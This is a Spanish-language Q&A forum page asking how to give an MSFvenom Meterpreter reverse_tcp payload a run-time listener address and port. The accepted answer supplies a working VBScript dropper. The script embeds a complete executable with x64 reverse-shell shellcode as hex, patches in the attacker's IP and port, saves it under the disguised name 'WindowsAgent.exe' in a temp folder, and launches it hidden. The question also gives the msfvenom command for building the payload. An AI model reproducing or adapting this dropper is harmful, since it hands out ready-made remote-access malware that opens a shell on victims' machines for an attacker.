Carga útil de MSFvenom con opciones dinámicas

Question

Carga útil de MSFvenom con opciones dinámicas

#1 de Hadoken (1 votos)
#2 de Gavin Youker (0 votos)

0

Estoy utilizando MSFvenom para exportar la carga útil de TCP inversa del meterpreter. Si bien esto funciona con msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.6.131 LPORT=4444 -f -exe > ~/Desktop/shell_meterpreter.exe , sin embargo, me gustaría especificar el LHOST y el LPORT de manera dinámica.

Lo ideal sería pasar los argumentos directamente al archivo ejecutable. Por ejemplo, en el símbolo del sistema ejecutando shell_meterpreter.exe -LHOST 192.168.6.100 -LPORT 1111 .

¿Alguien sabe de una manera de lograr esto? He intentado buscar en el código fuente pero no encontré mucha suerte allí.

shellcode metasploit meterpreter

pregunta Gavin Youker 17.11.2017 - 06:55

fuente

2 respuestas

1

msfvenom -p windows/x64/meterpreter/reverse_tcp **LHOST=192.168.x.x** LPORT=4444 -f -exe

Estás utilizando msfvenom aquí para generar código para obtener un shell inverso en el objetivo, no le estás pasando la ip de la máquina atacante una vez que se genera o, en tu caso, se compila como un ejecutable si eso tiene sentido.

respondido por el Hadoken 17.11.2017 - 07:58

fuente

Lea otras preguntas en las etiquetas shellcode metasploit meterpreter

¿Cuál es el nombre de este esquema de autenticación de token? Chaqueta de shell Chrome Process

score 0 · Accepted Answer

Logré encontrar una solución que funcionara para mí.

Encontré las variables para LPORT y LHOST en la vista hexadecimal del ejecutable (ver captura de pantalla).

Si alguien está interesado, escribí un pequeño script VBS que se empalma en ese código hexadecimal.

Function BuildExe(Text) 
    ' Convert the string to hex.
    Set dom = CreateObject("Microsoft.XMLDOM")
    dom.loadXML("<TtB/>")
    dom.documentElement.nodeTypedValue = Text
    dom.documentElement.dataType = "bin.hex"
    exeHex = dom.documentElement.nodeTypedValue

    ' Create the filename and filepath for the executable.
    exeFile = CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "\" & CreateObject("Scripting.FileSystemObject").GetTempName()
    CreateObject("Scripting.FileSystemObject").CreateFolder(exeFile)
    exePath = exeFile & "\" & "WindowsAgent.exe"

    ' Compile and save the executbale.
    Set exeStream = CreateObject("ADODB.Stream")
    exeStream.Type = 1
    exeStream.Open
    exeStream.Write exeHex
    exeStream.SaveToFile exePath, 2

    ' Return the executable filepath.
    BuildExe = exePath
End Function

' Initialize the script.
Log "PAYLOAD", "Payload shell_meterpreter.vbs has been launched."
Execute("lib\includes\build_exe.vbs")

' Set the listener info in hex.
LPORT = Hex("4444")

octets = Split("192.168.6.131"), ".")
For i = 0 To UBound(octets)
    octectTemp = Hex(octets(i))
    If Len(octectTemp) = 1 Then
        octectTemp = 0 & octectTemp
    End If

    If i = 0 Then
        LHOST = octectTemp
    Else
        LHOST = LHOST & octectTemp
    End If
Next

' Build and run Meterpreter.
exePath = BuildExe("4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000C80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000392411DD7D457F8E7D457F8E7D457F8E5A83048E7E457F8E7D457E8E7F457F8E743DEA8E7C457F8E743DEE8E7C457F8E526963687D457F8E0000000000000000000000000000000050450000648603007D3CC64B0000000000000000F00023000B0201000030000000100000000000000040000000100000000000400100000000100000000200000400000000000000040000000000000078420000480200006C34000002000080000010000000000000100000000000000000100000000000001000000000000000000000100000000000000000000000004200006C000000000000000000000000000000000000000000000000000000704200000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300000180000000000000000000000000000000000000000000000000000002E746578740000004E100000001000000012000000040000000000000000000000000000200000602E7264617461000084000000003000000002000000160000000000000000000000000000400000402E616F6C6500000078020000004000000004000000180000000000000000000000000000200000E000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004883EC2849C7C14000000049C7C00030000048C7C2001000004833C9E82710000048C7C10010000048BE4110004001000000488BF8F3A4FFD04833C9E8011000005041594C4F41443A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000CCFF25C00F0000FF25B20F000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004E420000000000005E4200000000000000000000000000004030000000000000000000007630000000300000000000000000000000000000000000000000000066300000000000005830000000000000000000000000000005014578697450726F636573730058045669727475616C416C6C6F6300004B45524E454C33322E646C6C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FC4883E4F0E8CC000000415141505251564831D265488B5260488B5218488B5220488B7250480FB74A4A4D31C94831C0AC3C617C022C2041C1C90D4101C1E2ED524151488B52208B423C4801D0668178180B020F85720000008B80880000004885C074674801D0508B4818448B40204901D0E35648FFC9418B34884801D64D31C94831C0AC41C1C90D4101C138E075F14C034C24084539D175D858448B40244901D066418B0C48448B401C4901D0418B04884801D0415841585E595A41584159415A4883EC204152FFE05841595A488B12E94BFFFFFF5D49BE7773325F3332000041564989E64881ECA00100004989E549BC0200" & LPORT & LHOST & "41544989E44C89F141BA4C772607FFD54C89EA68010100005941BA29806B00FFD56A0A415E50504D31C94D31C048FFC04889C248FFC04889C141BAEA0FDFE0FFD54889C76A1041584C89E24889F941BA99A57461FFD585C0740A49FFCE75E5E8930000004883EC104889E24D31C96A0441584889F941BA02D9C85FFFD583F8007E554883C4205E89F66A404159680010000041584889F24831C941BA58A453E5FFD54889C34989C74D31C94989F04889DA4889F941BA02D9C85FFFD583F8007D2858415759680040000041586A005A41BA0B2F0F30FFD5575941BA756E4D61FFD549FFCEE93CFFFFFF4801C34829C64885F675B441FFE7586A005949C7C2F0B5A256FFD500002842000000000000FFFFFFFF404200000030000000000000000000000000000000000000000000004E420000000000005E4200000000000000000000000000004B45524E454C33322E646C6C000058045669727475616C416C6C6F63000005014578697450726F63657373000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
WScript.CreateObject("WScript.Shell").Run "cmd.exe /C start /B cmd /C " & exePath, 0, True